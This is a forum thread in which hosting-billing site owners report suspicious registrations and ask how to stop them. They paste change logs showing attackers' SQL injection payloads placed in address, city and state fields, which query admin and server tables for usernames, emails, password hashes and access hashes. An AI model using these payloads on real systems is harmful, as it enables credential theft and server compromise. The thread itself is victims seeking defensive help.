Jump to content

Spam Account Keeps Registering


keenguitar

Recommended Posts

  • 1 month later...
  • Replies 80
  • Created
  • Last Reply

Top Posters In This Topic

Hi,

 

is there a way to stop this kind of attacks?

 

===================

Client ID: 2 - Dedemit ID has requested to change his/her details as indicated below:

Address 1: 'JL SYNTAX ERROR' to 'syntaxerror'
Address 2: 'JL SYNTAX ERROR' to 'syntaxerror'
City: 'd3d3' to 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins)'
Postcode: '404403' to '102030'
Default Payment Method: '' to ''
How Did You Hear About Us?: 'Google' to ''
If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

This change request was submitted from srv84.prodns.com.br (192.185.176.231)

 

Thank you

Link to comment
Share on other sites

  • 1 month later...

I am not even sure if this in the right section but I am going to put it here.

 

A couple hours ago I got an a person trying to register a domain the didn't (my settings are they they have to pay before the domain registration is sent to the registrar) and the info they gave was:

 

First Name	Cpanel
Last Name	Exploiter
Company Name	CpanelExp
Email Address	[email]wafer@mail.com[/email]
Address 1	hacked
Address 2	hacked
City	hacked
State/Region	hacked
Postcode	93125
Country	US - United States
Phone Number	850040404

 

and then they changed info to that looked like they were trying to injected PHP or MySQL code....

Address 1: 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)' to 'AES_ENCRYPT(1,1), address1= (SELECT MAX(type) FROM tblservers)'
Address 2: 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)' to 'AES_ENCRYPT(1,1), address2= (SELECT MAX(ipaddress) FROM tblservers)'
City: 'AES_ENCRYPT(1,1), city= (SELECT MIN(username) FROM tblservers)' to 'AES_ENCRYPT(1,1), city= (SELECT MAX(username) FROM tblservers)'
State: 'AES_ENCRYPT(1,1), state= (SELECT MIN(accesshash) FROM tblservers)' to 'AES_ENCRYPT(1,1), state= (SELECT MAX(accesshash) FROM tblservers)'
Default Payment Method: '' to '' 

 

They changed it several times the above is just one of them.... to the best I can see non of the Sites I have have been defaced and the my Server has not gotten a root log in since January (which was me).

 

Should I be worried?

 

Any help is NEEDED, and appreciated

Edited by Infopro
Changed Title
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.

×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use & Guidelines and understand your posts will initially be pre-moderated